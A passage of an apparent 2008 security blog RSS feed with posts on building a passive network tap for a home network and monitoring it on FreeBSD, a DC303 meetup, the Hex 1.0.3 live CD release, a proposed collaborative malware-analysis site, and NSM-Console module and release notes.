		<guid isPermaLink="false">http://thnetos.wordpress.com/?p=159</guid>
		<description><![CDATA[In my home network, I have a passive tap sitting between my cable modem and my router, instead of spending tons of money, I made my own. They&#8217;re surprisingly simple to make, and also extremely simple to use. Let&#8217;s start &#8230; <a href="http://thnetos.wordpress.com/2008/02/22/create-a-passive-network-tap-for-your-home-network/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=thnetos.wordpress.com&#038;blog=19195&#038;post=159&#038;subd=thnetos&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>In my home network, I have a passive tap sitting between my cable modem and my router, instead of spending tons of money, I made my own. They&#8217;re surprisingly simple to make, and also extremely simple to use.</p>
<p>Let&#8217;s start with the wiring, at a local electronics store, I purchased 4 RJ-45 wiring plugs, I probably shouldn&#8217;t have bought solder-less ones, but I didn&#8217;t feel like buying a board to solder them to. Anyhow, 2 of the ports will be used for entry and exit, the other two for taps. In this case, we need 2 extra ports so that inbound data is passed through one port, outbound data is passed through the other port.</p>
<p>Set up the wiring as shown in this wiring diagram (credit goes to the <a href="http://www.snort.org/docs/tap/">Snort team for the diagram</a>):</p>
<p><a href="http://thnetos.files.wordpress.com/2008/02/tapdiagram.gif" title="Direct link to file"></a></p>
<div style="text-align:center;"><a href="http://thnetos.files.wordpress.com/2008/02/tapdiagram.gif" title="Direct link to file"><img src="http://thnetos.files.wordpress.com/2008/02/tapdiagram.thumbnail.gif?w=142&#038;h=128" alt="tapdiagram.gif" border="0" height="128" width="142" /></a></div>
<p>Personally, I split open a network cable and used the wires inside just so the color coding could be correct, that&#8217;s probably the easiest way to wire the ports.</p>
<p>After wiring the ports, you should be able to test that data passed from one host port to the other host port is unchanged, below is a picture of the tap I created. Yes, I know it&#8217;s very messy, the box I bought for it didn&#8217;t fit the way I wanted.</p>
<p><a href="http://thnetos.files.wordpress.com/2008/02/tap.jpg" title="Direct link to file"></a></p>
<div style="text-align:center;"><a href="http://thnetos.files.wordpress.com/2008/02/tap.jpg" title="Direct link to file"><img src="http://thnetos.files.wordpress.com/2008/02/tap.thumbnail.jpg?w=171&#038;h=110" alt="tap.jpg" border="0" height="110" width="171" /></a></div>
<p>The next thing to do it connect the two ports (labeled &#8220;tap 1&#8243; and &#8220;tap 2&#8243; in the picture above) to 2 NICs in the machine of your choice. I&#8217;m using FreeBSD to manage the bridge. If you want to monitor outbound and inbound traffic separately, you&#8217;re done, just start tcpdump on the interface and you should be able to see all the traffic.</p>
<p>If you want to monitor both outbound and inbound traffic on the same interface, you&#8217;ll need to bridge the interfaces. You can accomplish this in <a href="http://freebsd.org">FreeBSD</a> with the following:</p>
<p><code>shell&gt; ifconfig bridge create<br />
shell&gt; ifconfig bridge0 addm ed0 addm ed1 monitor up<br />
shell&gt; tcpdump -i bridge0<br />
(or run snort/bro-ids/argus/etc on interface bridge0) </code></p>
<p>In this case, my network cards are ed0 and ed1, if you had different network interfaces, substitute them instead. You don&#8217;t need to assign an address to the bridge interface, since the only wires that are connected are the receive wires, so it wouldn&#8217;t transmit through the taps if it wanted to. For more advanced bridging, check out the FreeBSD manual on <a href="http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/network-bridging.html">bridging</a>.</p>
<p>I should note though, that you&#8217;ll need a 3rd network card in the monitoring machine if you want to remotely manage the machine.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/thnetos.wordpress.com/159/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/thnetos.wordpress.com/159/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/thnetos.wordpress.com/159/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/thnetos.wordpress.com/159/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=thnetos.wordpress.com&#038;blog=19195&#038;post=159&#038;subd=thnetos&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://thnetos.wordpress.com/2008/02/22/create-a-passive-network-tap-for-your-home-network/feed/</wfw:commentRss>
		<slash:comments>21</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/4536ba4e184002807cd1de1ce5ccd574?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96&#38;r=G" medium="image">
			<media:title type="html">thnetos</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/02/tapdiagram.thumbnail.gif" medium="image">
			<media:title type="html">tapdiagram.gif</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/02/tap.thumbnail.jpg" medium="image">
			<media:title type="html">tap.jpg</media:title>
		</media:content>
	</item>
		<item>
		<title>DC303 meeting this Friday</title>
		<link>http://thnetos.wordpress.com/2008/02/21/dc303-meeting-this-friday/</link>
		<comments>http://thnetos.wordpress.com/2008/02/21/dc303-meeting-this-friday/#comments</comments>
		<pubDate>Thu, 21 Feb 2008 18:39:04 +0000</pubDate>
		<dc:creator>Lee Hinman</dc:creator>
				<category><![CDATA[dc303]]></category>
		<category><![CDATA[infosec]]></category>
		<category><![CDATA[meetup]]></category>

		<guid isPermaLink="false">http://thnetos.wordpress.com/?p=156</guid>
		<description><![CDATA[I&#8217;ll be attending the DC303 meeting this Friday the 22nd (tomorrow), if anyone who reads this lives in the Denver/Metro area, stop by and say &#8220;Hi!&#8221;, I&#8217;d love to meet more information security people in Denver. This&#8217;ll be my first &#8230; <a href="http://thnetos.wordpress.com/2008/02/21/dc303-meeting-this-friday/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=thnetos.wordpress.com&#038;blog=19195&#038;post=156&#038;subd=thnetos&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>I&#8217;ll be attending the <a href="http://dc303.org">DC303</a> meeting this Friday the 22nd (tomorrow), if anyone who reads this lives in the Denver/Metro area, stop by and say &#8220;Hi!&#8221;, I&#8217;d love to meet more information security people in Denver. This&#8217;ll be my first time attending, as I only found out about it not that long ago.</p>
<p>The meetup is from 7-9pm at the <a href="http://www.netherworld.com/">Cafe@Netherworld</a>, the address is: 1278 Pennsylvania St. Denver, CO 80203</p>
<p>I&#8217;m looking forward to it!</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/thnetos.wordpress.com/156/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/thnetos.wordpress.com/156/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/thnetos.wordpress.com/156/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/thnetos.wordpress.com/156/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=thnetos.wordpress.com&#038;blog=19195&#038;post=156&#038;subd=thnetos&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://thnetos.wordpress.com/2008/02/21/dc303-meeting-this-friday/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/4536ba4e184002807cd1de1ce5ccd574?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96&#38;r=G" medium="image">
			<media:title type="html">thnetos</media:title>
		</media:content>
	</item>
		<item>
		<title>Hex 1.0.3 released!</title>
		<link>http://thnetos.wordpress.com/2008/02/13/hex-103-released/</link>
		<comments>http://thnetos.wordpress.com/2008/02/13/hex-103-released/#comments</comments>
		<pubDate>Thu, 14 Feb 2008 06:04:58 +0000</pubDate>
		<dc:creator>Lee Hinman</dc:creator>
				<category><![CDATA[1.0.3]]></category>
		<category><![CDATA[freebsd]]></category>
		<category><![CDATA[hex]]></category>
		<category><![CDATA[livecd]]></category>
		<category><![CDATA[monitoring]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[nsm]]></category>
		<category><![CDATA[nsm console]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://thnetos.wordpress.com/?p=152</guid>
		<description><![CDATA[We just released Hex 1.0.3, the Chinese New Year release, although it&#8217;s closer to the Valentine&#8217;s day release. Congratulations to all the Hex developers for fixing bugs and adding features! You can grab the iso here. [md5] [sha256] Or, grab &#8230; <a href="http://thnetos.wordpress.com/2008/02/13/hex-103-released/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=thnetos.wordpress.com&#038;blog=19195&#038;post=152&#038;subd=thnetos&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p><a href="http://thnetos.files.wordpress.com/2008/02/hex103icon.png" title="Direct link to file"><img src="http://thnetos.files.wordpress.com/2008/02/hex103icon.thumbnail.png?w=95&#038;h=128" alt="hex103icon.png" align="left" border="0" height="128" width="95" /></a>We just released <a href="http://www.rawpacket.org/projects/hex">Hex</a> 1.0.3, the <a href="http://en.wikipedia.org/wiki/Chinese_New_Year">Chinese New Year</a> release, although it&#8217;s closer to the Valentine&#8217;s day release. Congratulations to all the Hex developers for fixing bugs and adding features!</p>
<p>You can grab the iso <a href="http://bsd.ipv6.la/hex-i386-1.0.3.iso">here</a>. [<a href="http://bsd.ipv6.la/hex-i386-1.0.3.iso.md5">md5</a>] [<a href="http://bsd.ipv6.la/hex-i386-1.0.3.iso.sha256">sha256</a>]<br />
Or, grab the iso from the <a href="https://secure.redsphereglobal.com/data/tools/security/live/hex-i386-1.0.3.iso">mirror</a>. [<a href="https://secure.redsphereglobal.com/data/tools/security/live/hex-i386-1.0.3.iso.md5">md5</a>] [<a href="https://secure.redsphereglobal.com/data/tools/security/live/hex-i386-1.0.3.iso.sha256">sha256</a>]</p>
<p>Since <a href="http://geek00l.blogspot.com/2008/02/hex-103-release.html">Geek00l already covered a list of the most important changes in his blog post</a>, I&#8217;ll just echo the changes in <a href="http://thnetos.wordpress.com/nsm-console/">NSM-Console</a>, which is the software that I develop. The version of NSM-Console in Hex 1.0.3 is 0.6-DEVEL, which can be obtained either by checking out the code from subversion (<code>svn co <a href="http://svn.security.org.my/trunk/rawpacket-root/usr/home/analyzt/rp-NSM/nsm-console" rel="nofollow">http://svn.security.org.my/trunk/rawpacket-root/usr/home/analyzt/rp-NSM/nsm-console</a> nsm-console</code><b><code>)</code></b>, or waiting until I release 0.6 <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><b>New Features:</b><br />
- &#8216;<code>dump</code>&#8216; command added, you can now dump packet payloads into a binary file for later analysis<br />
- Significant speedups in the harimau module and &#8216;<code>checkip</code>&#8216; command if wget is installed<br />
- tcpxtract configuration file changed to extract more types of files<br />
- Added foremost module<br />
- Added clamscan module (Thanks JohnQPublic)<br />
- Argus and tcptrace have reverse dns turned off by default now, it was causing the module to hang for extremely large pcap files. Can be switched on by changed the module options<br />
- rot13 encoding and decoding added<b><br />
Bugfixes:</b><br />
- alias command<br />
- urlescape (en|de)coding<br />
- file existence check<br />
- many other things<br />
All the other enhancements, bugfixes and additions.</p>
<p>Since Hex 1.0.2 had NSM-Console version 0.2 in it, if you haven&#8217;t downloaded the console or checked it out from subversion since the last hex release, here&#8217;s what else has been added since then:</p>
<ul>
<li><a href="http://thnetos.wordpress.com/2008/02/05/nsm-console-version-05-release/">Release notes for NSM-Console version 0.5</a></li>
</ul>
<ul>
<li><a href="http://thnetos.wordpress.com/2008/01/16/nsm-console-version-04-release/">Release notes for NSM-Console version 0.4 </a></li>
</ul>
<ul>
<li><a href="http://thnetos.wordpress.com/2008/01/08/nsm-console-version-03-release/">Release notes for NSM-Console version 0.3</a></li>
</ul>
<p>Or you can view the <a href="https://trac.security.org.my/hex/browser/trunk/rawpacket-root/usr/home/analyzt/rp-NSM/nsm-console/TODO">TODO</a> and <a href="https://trac.security.org.my/hex/browser/trunk/rawpacket-root/usr/home/analyzt/rp-NSM/nsm-console/CHANGELOG">CHANGELOG</a> for NSM-Console directly. If you want to check out more information about either of the projects, check out the Trac pages for <a href="https://trac.security.org.my/hex/wiki">Hex</a> and <a href="https://trac.security.org.my/hex/wiki/nsm-console">NSM-Console</a>:</p>
<p>Now, onward to FreeBSD 7.0! <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/thnetos.wordpress.com/152/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/thnetos.wordpress.com/152/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/thnetos.wordpress.com/152/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/thnetos.wordpress.com/152/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=thnetos.wordpress.com&#038;blog=19195&#038;post=152&#038;subd=thnetos&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://thnetos.wordpress.com/2008/02/13/hex-103-released/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/4536ba4e184002807cd1de1ce5ccd574?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96&#38;r=G" medium="image">
			<media:title type="html">thnetos</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/02/hex103icon.thumbnail.png" medium="image">
			<media:title type="html">hex103icon.png</media:title>
		</media:content>
	</item>
		<item>
		<title>Collaborative analysis efforts with simple to use interfaces</title>
		<link>http://thnetos.wordpress.com/2008/02/12/collaborative-analysis-efforts-with-simple-to-use-interfaces/</link>
		<comments>http://thnetos.wordpress.com/2008/02/12/collaborative-analysis-efforts-with-simple-to-use-interfaces/#comments</comments>
		<pubDate>Tue, 12 Feb 2008 22:55:23 +0000</pubDate>
		<dc:creator>Lee Hinman</dc:creator>
				<category><![CDATA[analysis]]></category>
		<category><![CDATA[binary]]></category>
		<category><![CDATA[collaboration]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[pcap]]></category>
		<category><![CDATA[research]]></category>

		<guid isPermaLink="false">http://thnetos.wordpress.com/?p=154</guid>
		<description><![CDATA[You know what would be really helpful? I mean, actually helpful to people in the security industry as a whole? We need some kind of collaboration tool that allows many different users to view, download, analyze, tag, describe and ask &#8230; <a href="http://thnetos.wordpress.com/2008/02/12/collaborative-analysis-efforts-with-simple-to-use-interfaces/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=thnetos.wordpress.com&#038;blog=19195&#038;post=154&#038;subd=thnetos&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>You know what would be really helpful? I mean, actually helpful to people in the security industry as a whole? We need some kind of collaboration tool that allows many different users to view, download, analyze, tag, describe and ask questions about any and all kinds of malware, network captures and security logs. I&#8217;ve been talking to some of the #rawpacket guys/gals about how it would work, so now I&#8217;m stealing their ideas for a blog post <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>For example, let&#8217;s say you discover a new binary malware that one of your honeypots caught, here&#8217;s how I envision this would work out:</p>
<ol>
<li>You register an account at the collaboration website, you can additionally assign your pgp key to your name, security people like to know who they&#8217;re actually talking with.</li>
<li>You upload the file, in this case it&#8217;s a .exe file, tagging it with a basic description (&#8220;<a href="http://nepenthes.mwcollect.org/">nepenthes</a> honeypot caught this transferred over ftp, I think it&#8217;s a trojan, etc, etc&#8221;) and tags so it becomes searchable (exe, malware, binary, ftp).</li>
<li>The file/pcap is anonymized (optional, but would be extremely nice)</li>
<li>After the initial upload, the collaboration server performs super-basic, but good baseline analysis on the file, saving the results for later. For a .exe file, it could be things like md5sum, clamscan and strings. For other types of files, different tools could be used (*cough* an automated <a href="http://thnetos.wordpress.com/nsm-console">NSM-Console</a> session *cough*), etc</li>
<li>The malware is displayed on the page, security gurus log into their account, have the ability to download the binary to play with it themselves, and are encouraged to share what they found when doing their analysis (and how). They have the ability to upload screenshots, short video clips, textfiles, whatever would help with the analysis. This of it like a traditional website &#8216;shoutbox&#8217;, but with comments on a particular piece of malware or network capture.</li>
<li>Users can also create correlations between different submissions, Example: &#8220;This is the link to the network capture for the worm exploiting this particular binary malware&#8221;, now we can draw pretty graphs!</li>
<li>Discussion continues until the file has been &#8220;figure out&#8221;. Give people &#8216;karma&#8217; or whatever to encourage posting.</li>
<li>????</li>
<li>Profit!</li>
</ol>
<p>In all seriousness, you know what I think would be great about this? The community as a whole benefits from the knowledge and talent of people who are good at an individual skill. For instance, I might suck at binary malware analysis, but I can help decode what&#8217;s going on with a network trace picked up by an IDS. Community is created, knowledge is shared, security can be improved, people become familiar with the parts of security in which they lack knowledge, everyone is happy.</p>
<p>Make the framework distributable, small groups of people can set up their own collaboration for working with extremely confidential files, think <a href="http://trac.edgewall.org/">Trac</a>, but instead of bug reports and svn tracking, malware/pcap collaboration and research.</p>
<p>There are projects already like this, I&#8217;m excited for the direction that <a href="http://beta.openpacket.org:8080/">OpenPacket</a> is going with packet captures, upload a file and it&#8217;s automatically run through tshark, giving you a baseline to start working with. I think that if the idea is expanded, we can get a lot of different people involved. I know I&#8217;d certainly like to get better at doing binary analysis.</p>
<p>Does this sound interesting? It certainly does to me. I&#8217;m curious if anyone else is interested, leave me a comment and let me know if you&#8217;d be interested in something like this! (Maybe if 40 hours suddenly appear out of nowhere I&#8217;m start working on it&#8230;)</p>
<p>P.S. I didn&#8217;t think of all of this myself, thanks to all the people in #rawpacket for their ideas <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  Just want to give credit where it&#8217;s due&#8230; <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/thnetos.wordpress.com/154/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/thnetos.wordpress.com/154/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/thnetos.wordpress.com/154/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/thnetos.wordpress.com/154/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=thnetos.wordpress.com&#038;blog=19195&#038;post=154&#038;subd=thnetos&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://thnetos.wordpress.com/2008/02/12/collaborative-analysis-efforts-with-simple-to-use-interfaces/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/4536ba4e184002807cd1de1ce5ccd574?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96&#38;r=G" medium="image">
			<media:title type="html">thnetos</media:title>
		</media:content>
	</item>
		<item>
		<title>User-submitted modules: flowtag and clamscan</title>
		<link>http://thnetos.wordpress.com/2008/02/11/user-submitted-modules-flowtag-and-clamscan/</link>
		<comments>http://thnetos.wordpress.com/2008/02/11/user-submitted-modules-flowtag-and-clamscan/#comments</comments>
		<pubDate>Mon, 11 Feb 2008 20:14:48 +0000</pubDate>
		<dc:creator>Lee Hinman</dc:creator>
				<category><![CDATA[clamav]]></category>
		<category><![CDATA[clamscan]]></category>
		<category><![CDATA[flowtag]]></category>
		<category><![CDATA[hex]]></category>
		<category><![CDATA[module]]></category>
		<category><![CDATA[monitoring]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[nsm]]></category>
		<category><![CDATA[nsm console]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[submission]]></category>
		<category><![CDATA[svn]]></category>

		<guid isPermaLink="false">http://thnetos.wordpress.com/?p=153</guid>
		<description><![CDATA[I&#8217;d like to point out a couple of user-submitted modules for NSM-Console that are now included in the distribution. Firstly, scholar01 has created a &#8216;flowtag&#8217; module for NSM-Console to use Chris Lee&#8217;s  excellent Flowtag software for categorizing and tagging network &#8230; <a href="http://thnetos.wordpress.com/2008/02/11/user-submitted-modules-flowtag-and-clamscan/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=thnetos.wordpress.com&#038;blog=19195&#038;post=153&#038;subd=thnetos&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>I&#8217;d like to point out a couple of user-submitted modules for <a href="http://thnetos.wordpress.com/nsm-console/">NSM-Console</a> that are now included in the distribution.</p>
<p>Firstly, scholar01 has created a &#8216;flowtag&#8217; module for NSM-Console to use Chris Lee&#8217;s  excellent <a href="http://chrislee.dhs.org/pages/research/projects.html">Flowtag</a> software for categorizing and tagging network flow for a packet capture. Thanks for the submission scholar01!</p>
<p>Secondly, JohnQPublic has created a &#8216;clamscan&#8217; module to in order to scan the files extracted by either <a href="http://tcpxtract.sourceforge.net/">tcpxtract</a> or <a href="http://foremost.sourceforge.net/">foremost</a> for viruses. The clamscan module uses the popular open-source antivirus <a href="http://www.clamav.net/">ClamAV</a> software. Thanks JohnQPublic!</p>
<p>Both of these modules have been committed into NSM-Console&#8217;s code, and while only flowtag is included in the <a href="http://thnetos.wordpress.com/2008/02/05/nsm-console-version-05-release/">0.5 release</a>, you can try them out by checking NSM-Console out of SVN with the following command:</p>
<p><b><code>svn co <a href="http://svn.security.org.my/trunk/rawpacket-root/usr/home/analyzt/rp-NSM/nsm-console" rel="nofollow">http://svn.security.org.my/trunk/rawpacket-root/usr/home/analyzt/rp-NSM/nsm-console</a> nsm-console</code></b></p>
<p>Note that the majority of the code I commit to svn is stable enough for regular usage, it just doesn&#8217;t undergo the regular testing that the point-releases do before they are released.</p>
<p>Thanks to both authors for submitting modules, they&#8217;re now included in the &#8216;credits&#8217; command. <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/thnetos.wordpress.com/153/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/thnetos.wordpress.com/153/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/thnetos.wordpress.com/153/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/thnetos.wordpress.com/153/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=thnetos.wordpress.com&#038;blog=19195&#038;post=153&#038;subd=thnetos&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://thnetos.wordpress.com/2008/02/11/user-submitted-modules-flowtag-and-clamscan/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/4536ba4e184002807cd1de1ce5ccd574?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96&#38;r=G" medium="image">
			<media:title type="html">thnetos</media:title>
		</media:content>
	</item>
		<item>
		<title>NSM-Console version 0.5 release</title>
		<link>http://thnetos.wordpress.com/2008/02/05/nsm-console-version-05-release/</link>
		<comments>http://thnetos.wordpress.com/2008/02/05/nsm-console-version-05-release/#comments</comments>
		<pubDate>Tue, 05 Feb 2008 20:08:02 +0000</pubDate>
		<dc:creator>Lee Hinman</dc:creator>
				<category><![CDATA[bro-ids]]></category>
		<category><![CDATA[checkip]]></category>
		<category><![CDATA[flowtime]]></category>
		<category><![CDATA[framework]]></category>
		<category><![CDATA[harimau]]></category>
		<category><![CDATA[hex]]></category>
		<category><![CDATA[monitoring]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[nsm]]></category>
		<category><![CDATA[nsm console]]></category>
		<category><![CDATA[ruby]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[snort]]></category>

		<guid isPermaLink="false">http://thnetos.wordpress.com/?p=151</guid>
		<description><![CDATA[That&#8217;s right, no development release this time around. I&#8217;ve been trying to get version 0.5 all finished for the Hex 1.0.3 release, and I&#8217;m happy to present the newest NSM-Console release! Firstly, you can download NSM-Console version 0.5 here: http://navi.eight7.org/~hinmanm/files/nsm-console-0.5.tar.gz &#8230; <a href="http://thnetos.wordpress.com/2008/02/05/nsm-console-version-05-release/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=thnetos.wordpress.com&#038;blog=19195&#038;post=151&#038;subd=thnetos&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p><a href="void(0)" id="file-link-135" title="smallmonkey" class="file-link image">  			<img src="http://thnetos.files.wordpress.com/2008/01/smallmonkey.thumbnail.png?w=500" alt="smallmonkey" align="left" border="0" /></a>That&#8217;s right, no development release this time around. I&#8217;ve been trying to get version 0.5 all finished for the Hex 1.0.3 release, and I&#8217;m happy to present the newest <a href="http://thnetos.wordpress.com/nsm-console">NSM-Console</a> release!</p>
<p>Firstly, you can download NSM-Console version 0.5 here:<br />
<a href="http://navi.eight7.org/~hinmanm/files/nsm-console-0.5.tar.gz">http://navi.eight7.org/~hinmanm/files/nsm-console-0.5.tar.gz</a></p>
<p>Mirror here:<br />
<a href="https://secure.redsphereglobal.com/data/dakrone/files/nsm-console-0.5.tar.gz">https://secure.redsphereglobal.com/data/dakrone/files/nsm-console-0.5.tar.gz</a></p>
<p>Like always, let&#8217;s go over some of the new features in this release:</p>
<p><b>Alias command</b><br />
You can now alias a command whatever else you would like to, the syntax is the same as regular bash alias syntax, for instance, here are my aliases from my ~/.nsmcrc:<br />
<code>alias ls = list<br />
alias ll = list<br />
alias serv = e cat /etc/services | grep</code><br />
So as an example, if I wanted to look up a service port, now I just type &#8220;<code>serv 5190</code>&#8221; and see if /etc/services has an entry for that port. (I have a habit of hitting &#8216;ll&#8217; or &#8216;ls&#8217; all the time, so now at least they&#8217;re useful)</p>
<p><b>Additional modules: flowtime and harimau</b><br />
I added a couple of modules, the first is <a href="http://thnetos.wordpress.com/2008/01/24/flowtime-create-a-timeline-for-packet-flow/">flowtime</a>, which is a packet timeliner that I wrote about in <a href="http://thnetos.wordpress.com/2008/01/24/flowtime-create-a-timeline-for-packet-flow/">this post</a>. The second is the Harimau module, which will query the <a href="http://watchlist.security.org.my/">Harimau watchlist</a> for all the IPs in a pcap file and print out the matching entries. Thanks go to <a href="http://mel.icious.net/">Spoonfork</a> and the <a href="http://security.org.my">Security.org.my</a> team for the awesome tool.<br />
Note: flowtime won&#8217;t work out of the box in Hex unless you install Argus version 3 (not version 2, which is what Hex comes with) as well as symlink &#8216;ploticus&#8217; to &#8216;pl&#8217; somewhere in your path.</p>
<p><b>Checkip command</b><br />
Speaking of the Harimau watchlist, it has also been integrated as an NSM-Console command. You can see an example here:<br />
<code>nsm&gt; checkip 209.177.146.34<br />
209.177.146.34,www.emergingthreats.net/rules/bleeding-botcc.rules,botcc,2008-02-05 00:03:10</code></p>
<p><b>Module improvements</b><br />
The snort module now uses the ac-bnfa search algorithm, which should help on systems with lower amounts of RAM (*cough* like my own). In addition, the bro-ids module now actually generates many more helpful reports and actually performs intrusion detection instead of just generating flow content. Some modules have been added to categories to make them easier to toggle.</p>
<p><b>Other minor improvements</b><br />
Toggle handles multiple module names, space separated<br />
All NSM-Console errors finally go to STDERR instead of STDOUT<br />
Help command is much more readable and supports argument to get help about a particular command.<br />
~./nsmcrc is read extremely quietly now, so it doesn&#8217;t fill up the screen<br />
Bugfixes.</p>
<p>You can read the <a href="https://trac.security.org.my/hex/browser/trunk/rawpacket-root/usr/home/analyzt/rp-NSM/nsm-console/CHANGELOG">entire changelog here</a>.</p>
<p>As always, please please please let me know if you have any comments, criticisms or suggestions <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  Feel free to email me or leave a comment below.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/thnetos.wordpress.com/151/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/thnetos.wordpress.com/151/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/thnetos.wordpress.com/151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/thnetos.wordpress.com/151/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=thnetos.wordpress.com&#038;blog=19195&#038;post=151&#038;subd=thnetos&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://thnetos.wordpress.com/2008/02/05/nsm-console-version-05-release/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/4536ba4e184002807cd1de1ce5ccd574?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96&#38;r=G" medium="image">
			<media:title type="html">thnetos</media:title>
		</media:content>

		<media:content url="http://thnetos.files.wordpress.com/2008/01/smallmonkey.thumbnail.png" medium="image">
			<media:title type="html">smallmonkey</media:title>
		</media:content>
	</item>
	</channel>
</rss>
